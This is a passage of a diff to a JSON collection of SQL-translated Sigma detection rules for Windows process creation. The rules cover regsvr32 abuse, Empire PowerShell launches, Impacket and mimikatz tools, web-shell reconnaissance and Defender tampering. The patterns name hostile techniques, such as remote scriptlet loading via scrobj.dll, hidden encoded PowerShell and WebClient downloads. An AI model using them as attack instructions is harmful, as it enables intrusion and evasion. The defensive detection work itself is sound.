OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_bitsadmin_download.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth 
(Nextron Systems)", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' 
ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": 
"proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE 
'\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "title": "Esentutl Steals Browser Information", + "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "status": "experimental", + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR 
OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_esentutl_webcache.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", - "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "New Network Trace Capture Started Via Netsh.EXE", - "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", - "author": "Kutepov Anton, oscd.community", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administration activity" + "Other tools that incidentally use the same command line parameters" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_packet_capture.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to 
evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious MsiExec Embedding Parent", + "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "status": "experimental", + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "author": "frack113", "tags": [ + "attack.t1218.007", "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_msiexec_embedding.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", 
"author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of the impacket tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "PowerShell Download Pattern", - "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "status": "test", - "description": "Detects a Powershell process that contains download commands in its command line string", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "status": "experimental", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND 
CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_patterns.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "Suspicious Execution of InstallUtil Without Log", - "id": "d042284c-a296-4988-9be5-f424fadcc28c", + "title": "Windows Defender Definition Files Removed", + "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "status": "test", - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND NewProcessName LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_instalutil_no_log_execution.yml" + "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "title": "PUA - AdFind 
Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE 
'%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Use of UltraVNC Remote Access Software", - "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "title": "Lolbin Ssh.exe Use As Proxy", + "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "author": "frack113", + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Legitimate usage for administration purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_ultravnc.yml" + "filename": "proc_creation_win_lolbin_ssh.yml" }, { - "title": "Automated Collection Command Prompt", - "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "title": "LOLBIN From Abnormal Drive", + "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "status": 
